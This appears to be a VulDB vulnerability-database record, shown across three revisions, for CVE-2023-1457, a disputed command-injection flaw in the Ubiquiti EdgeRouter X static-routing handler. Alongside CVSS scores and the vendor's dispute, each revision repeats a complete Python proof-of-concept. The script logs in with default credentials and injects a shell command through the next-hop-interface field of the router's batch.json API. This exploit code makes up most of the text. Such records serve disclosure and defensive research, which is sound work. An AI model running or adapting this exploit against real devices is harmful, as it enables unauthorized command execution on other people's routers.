| Campo | 17/03/2023 08:39 | 11/04/2023 11:55 | 11/04/2023 12:03 |
|---|
| vendor | Ubiquiti | Ubiquiti | Ubiquiti |
| name | EdgeRouter X | EdgeRouter X | EdgeRouter X |
| version | 2.0.9-hotfix.6 | 2.0.9-hotfix.6 | 2.0.9-hotfix.6 |
| component | Static Routing Configuration Handler | Static Routing Configuration Handler | Static Routing Configuration Handler |
| argument | next-hop-interface | next-hop-interface | next-hop-interface |
| cwe | 77 (escalazione di privilegi) | 77 (escalazione di privilegi) | 77 (escalazione di privilegi) |
| risk | 2 | 2 | 2 |
| cvss3_vuldb_av | N | N | N |
| cvss3_vuldb_ac | L | L | L |
| cvss3_vuldb_pr | H | H | H |
| cvss3_vuldb_ui | N | N | N |
| cvss3_vuldb_s | U | U | U |
| cvss3_vuldb_c | H | H | H |
| cvss3_vuldb_i | H | H | H |
| cvss3_vuldb_a | H | H | H |
| cvss3_vuldb_e | P | P | P |
| cvss3_vuldb_rl | U | U | U |
| cvss3_vuldb_rc | R | R | R |
| availability | 1 | 1 | 1 |
| publicity | 1 | 1 | 1 |
| cve | CVE-2023-1457 | CVE-2023-1457 | CVE-2023-1457 |
| responsible | VulDB | VulDB | VulDB |
| response_summary | The vendor position is that post-authentication issues are not accepted as vulnerabilities. | The vendor position is that post-authentication issues are not accepted as vulnerabilities. | The vendor position is that post-authentication issues are not accepted as vulnerabilities. |
| cvss2_vuldb_ai | C | C | C |
| cvss2_vuldb_e | POC | POC | POC |
| cvss2_vuldb_rc | UR | UR | UR |
| cvss2_vuldb_rl | U | U | U |
| cvss2_vuldb_basescore | 8.3 | 8.3 | 8.3 |
| cvss2_vuldb_tempscore | 7.1 | 7.1 | 7.1 |
| cvss3_vuldb_basescore | 7.2 | 7.2 | 7.2 |
| cvss3_vuldb_tempscore | 6.5 | 6.5 | 6.5 |
| cvss3_meta_basescore | 7.2 | 7.2 | 8.1 |
| cvss3_meta_tempscore | 6.5 | 6.5 | 7.8 |
| date | 1679007600 (17/03/2023) | 1679007600 (17/03/2023) | 1679007600 (17/03/2023) |
| type | Router Operating System | Router Operating System | Router Operating System |
| cvss2_vuldb_av | N | N | N |
| cvss2_vuldb_ac | L | L | L |
| cvss2_vuldb_au | M | M | M |
| cvss2_vuldb_ci | C | C | C |
| cvss2_vuldb_ii | C | C | C |
| disputed | 1 | 1 | 1 |
| sourcecode | import requests
import json
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
username = 'ubnt'
password = 'ubnt'
device_web_ip = '192.168.1.1'
ping_target = '192.168.1.5'
inject_cmd = 'ping -c 1 ' + ping_target
inject_cmd += ';touch /etc/test'
phpsessid = '35a9f702c8c6486596c6b749a6fd9d1c'
csrftoken = 'ca13a024a18598042d0d1323146ea18af8a44554eb8a68c7807a9cd6f5a6cca6'
header ={
'Host': '{}'.format(device_web_ip),
'User-Agent': 'dummy',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '27',
'Origin': 'https://{}/'.format(device_web_ip),
'Connection': 'keep-alive',
'Referer': 'https://{}/'.format(device_web_ip),
'Cookie': 'PHPSESSID={0}; X-CSRF-TOKEN={1}; beaker.session.id={0}; ip_address_top_user_option=total_bytes'.format(phpsessid,csrftoken),
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-User': '?1'
}
login_body = 'username={}&password={}'.format(username,password)
login_url = 'https://{}/'.format(device_web_ip)
loop = 3
r = None
while loop>0:
try:
loop -= 1
r = requests.post(url=login_url,headers=header,data=login_body,\
timeout=5,verify=False,allow_redirects=False)
if r is None or 'Set-Cookie' not in r.headers.keys():
print("Login failed.")
time.sleep((3-loop)*3)
else:
break
except Exception as e:
print('Login error:{}'.format(e))
if r is None:
print('Failed login,please check and retry!')
exit(1)
tmp:dict = requests.utils.dict_from_cookiejar(r.cookies)
for k,v in tmp.items():
if 'PHPSESSID' == k:
phpsessid = '{}'.format(v)
elif 'X-CSRF-TOKEN' == k:
csrftoken = '{}'.format(v)
elif 'beaker.session.id' == k:
sessionid = '{}'.format(v)
cookie = 'PHPSESSID={0}; X-CSRF-TOKEN={1}; beaker.session.id={0}; ip_address_top_user_option=total_bytes'.format(phpsessid,csrftoken)
param = {
'SET': {'protocols': {'static': {'interface-route': {'10.10.12.0/24':
{'next-hop-interface': 'eth2/index.html|{}|'.format(inject_cmd)}}}}},
'GET': {'protocols': {'static': {'interface-route': {'10.10.12.0/24': {'next-hop-interface': {'eth2': None}}}}}}}
victim_url = 'https://{}/api/edge/batch.json'.format(device_web_ip)
victim_body = json.dumps(param)
victim_header = {
'Host': '{}'.format(device_web_ip),
'User-Agent': 'dummy',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/json',
'X-CSRF-TOKEN': '{}'.format(csrftoken),
'X-Requested-With': 'XMLHttpRequest',
'Origin': 'https://{}/'.format(device_web_ip),
'Connection': 'keep-alive',
'Referer': 'https://{}/'.format(device_web_ip),
'Cookie': 'PHPSESSID={0};X-CSRF-TOKEN={1};ip_address_top_user_option=total_bytes;beaker.session.id={0}'.format(phpsessid,csrftoken),
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin'}
r = requests.post(url=victim_url,headers=victim_header,data=victim_body,\
timeout=5,verify=False,allow_redirects=False)
print(r.status_code) | import requests
import json
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
username = 'ubnt'
password = 'ubnt'
device_web_ip = '192.168.1.1'
ping_target = '192.168.1.5'
inject_cmd = 'ping -c 1 ' + ping_target
inject_cmd += ';touch /etc/test'
phpsessid = '35a9f702c8c6486596c6b749a6fd9d1c'
csrftoken = 'ca13a024a18598042d0d1323146ea18af8a44554eb8a68c7807a9cd6f5a6cca6'
header ={
'Host': '{}'.format(device_web_ip),
'User-Agent': 'dummy',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '27',
'Origin': 'https://{}/'.format(device_web_ip),
'Connection': 'keep-alive',
'Referer': 'https://{}/'.format(device_web_ip),
'Cookie': 'PHPSESSID={0}; X-CSRF-TOKEN={1}; beaker.session.id={0}; ip_address_top_user_option=total_bytes'.format(phpsessid,csrftoken),
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-User': '?1'
}
login_body = 'username={}&password={}'.format(username,password)
login_url = 'https://{}/'.format(device_web_ip)
loop = 3
r = None
while loop>0:
try:
loop -= 1
r = requests.post(url=login_url,headers=header,data=login_body,\
timeout=5,verify=False,allow_redirects=False)
if r is None or 'Set-Cookie' not in r.headers.keys():
print("Login failed.")
time.sleep((3-loop)*3)
else:
break
except Exception as e:
print('Login error:{}'.format(e))
if r is None:
print('Failed login,please check and retry!')
exit(1)
tmp:dict = requests.utils.dict_from_cookiejar(r.cookies)
for k,v in tmp.items():
if 'PHPSESSID' == k:
phpsessid = '{}'.format(v)
elif 'X-CSRF-TOKEN' == k:
csrftoken = '{}'.format(v)
elif 'beaker.session.id' == k:
sessionid = '{}'.format(v)
cookie = 'PHPSESSID={0}; X-CSRF-TOKEN={1}; beaker.session.id={0}; ip_address_top_user_option=total_bytes'.format(phpsessid,csrftoken)
param = {
'SET': {'protocols': {'static': {'interface-route': {'10.10.12.0/24':
{'next-hop-interface': 'eth2/index.html|{}|'.format(inject_cmd)}}}}},
'GET': {'protocols': {'static': {'interface-route': {'10.10.12.0/24': {'next-hop-interface': {'eth2': None}}}}}}}
victim_url = 'https://{}/api/edge/batch.json'.format(device_web_ip)
victim_body = json.dumps(param)
victim_header = {
'Host': '{}'.format(device_web_ip),
'User-Agent': 'dummy',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/json',
'X-CSRF-TOKEN': '{}'.format(csrftoken),
'X-Requested-With': 'XMLHttpRequest',
'Origin': 'https://{}/'.format(device_web_ip),
'Connection': 'keep-alive',
'Referer': 'https://{}/'.format(device_web_ip),
'Cookie': 'PHPSESSID={0};X-CSRF-TOKEN={1};ip_address_top_user_option=total_bytes;beaker.session.id={0}'.format(phpsessid,csrftoken),
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin'}
r = requests.post(url=victim_url,headers=victim_header,data=victim_body,\
timeout=5,verify=False,allow_redirects=False)
print(r.status_code) | import requests
import json
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
username = 'ubnt'
password = 'ubnt'
device_web_ip = '192.168.1.1'
ping_target = '192.168.1.5'
inject_cmd = 'ping -c 1 ' + ping_target
inject_cmd += ';touch /etc/test'
phpsessid = '35a9f702c8c6486596c6b749a6fd9d1c'
csrftoken = 'ca13a024a18598042d0d1323146ea18af8a44554eb8a68c7807a9cd6f5a6cca6'
header ={
'Host': '{}'.format(device_web_ip),
'User-Agent': 'dummy',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '27',
'Origin': 'https://{}/'.format(device_web_ip),
'Connection': 'keep-alive',
'Referer': 'https://{}/'.format(device_web_ip),
'Cookie': 'PHPSESSID={0}; X-CSRF-TOKEN={1}; beaker.session.id={0}; ip_address_top_user_option=total_bytes'.format(phpsessid,csrftoken),
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-User': '?1'
}
login_body = 'username={}&password={}'.format(username,password)
login_url = 'https://{}/'.format(device_web_ip)
loop = 3
r = None
while loop>0:
try:
loop -= 1
r = requests.post(url=login_url,headers=header,data=login_body,\
timeout=5,verify=False,allow_redirects=False)
if r is None or 'Set-Cookie' not in r.headers.keys():
print("Login failed.")
time.sleep((3-loop)*3)
else:
break
except Exception as e:
print('Login error:{}'.format(e))
if r is None:
print('Failed login,please check and retry!')
exit(1)
tmp:dict = requests.utils.dict_from_cookiejar(r.cookies)
for k,v in tmp.items():
if 'PHPSESSID' == k:
phpsessid = '{}'.format(v)
elif 'X-CSRF-TOKEN' == k:
csrftoken = '{}'.format(v)
elif 'beaker.session.id' == k:
sessionid = '{}'.format(v)
cookie = 'PHPSESSID={0}; X-CSRF-TOKEN={1}; beaker.session.id={0}; ip_address_top_user_option=total_bytes'.format(phpsessid,csrftoken)
param = {
'SET': {'protocols': {'static': {'interface-route': {'10.10.12.0/24':
{'next-hop-interface': 'eth2/index.html|{}|'.format(inject_cmd)}}}}},
'GET': {'protocols': {'static': {'interface-route': {'10.10.12.0/24': {'next-hop-interface': {'eth2': None}}}}}}}
victim_url = 'https://{}/api/edge/batch.json'.format(device_web_ip)
victim_body = json.dumps(param)
victim_header = {
'Host': '{}'.format(device_web_ip),
'User-Agent': 'dummy',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/json',
'X-CSRF-TOKEN': '{}'.format(csrftoken),
'X-Requested-With': 'XMLHttpRequest',
'Origin': 'https://{}/'.format(device_web_ip),
'Connection': 'keep-alive',
'Referer': 'https://{}/'.format(device_web_ip),
'Cookie': 'PHPSESSID={0};X-CSRF-TOKEN={1};ip_address_top_user_option=total_bytes;beaker.session.id={0}'.format(phpsessid,csrftoken),
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin'}
r = requests.post(url=victim_url,headers=victim_header,data=victim_body,\
timeout=5,verify=False,allow_redirects=False)
print(r.status_code) |
| price_0day | $0-$5k | $0-$5k | $0-$5k |
| cve_assigned | | 1679007600 (17/03/2023) | 1679007600 (17/03/2023) |
| cve_nvd_summary | | ** DISPUTED ** A vulnerability, which was classified as critical, was found in Ubiquiti EdgeRouter X 2.0.9-hotfix.6. Affected is an unknown function of the component Static Routing Configuration Handler. The manipulation of the argument next-hop-interface leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. VDB-223302 is the identifier assigned to this vulnerability. NOTE: The vendor position is that post-authentication issues are not accepted as vulnerabilities. | ** DISPUTED ** A vulnerability, which was classified as critical, was found in Ubiquiti EdgeRouter X 2.0.9-hotfix.6. Affected is an unknown function of the component Static Routing Configuration Handler. The manipulation of the argument next-hop-interface leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. VDB-223302 is the identifier assigned to this vulnerability. NOTE: The vendor position is that post-authentication issues are not accepted as vulnerabilities. |
| cvss3_nvd_av | | | N |
| cvss3_nvd_ac | | | L |
| cvss3_nvd_pr | | | N |
| cvss3_nvd_ui | | | N |
| cvss3_nvd_s | | | U |
| cvss3_nvd_c | | | H |
| cvss3_nvd_i | | | H |
| cvss3_nvd_a | | | H |
| cvss2_nvd_av | | | N |
| cvss2_nvd_ac | | | L |
| cvss2_nvd_au | | | M |
| cvss2_nvd_ci | | | C |
| cvss2_nvd_ii | | | C |
| cvss2_nvd_ai | | | C |
| cvss3_cna_av | | | N |
| cvss3_cna_ac | | | L |
| cvss3_cna_pr | | | H |
| cvss3_cna_ui | | | N |
| cvss3_cna_s | | | U |
| cvss3_cna_c | | | H |
| cvss3_cna_i | | | H |
| cvss3_cna_a | | | H |
| cve_cna | | | VulDB |
| cvss2_nvd_basescore | | | 8.3 |
| cvss3_nvd_basescore | | | 9.8 |
| cvss3_cna_basescore | | | 7.2 |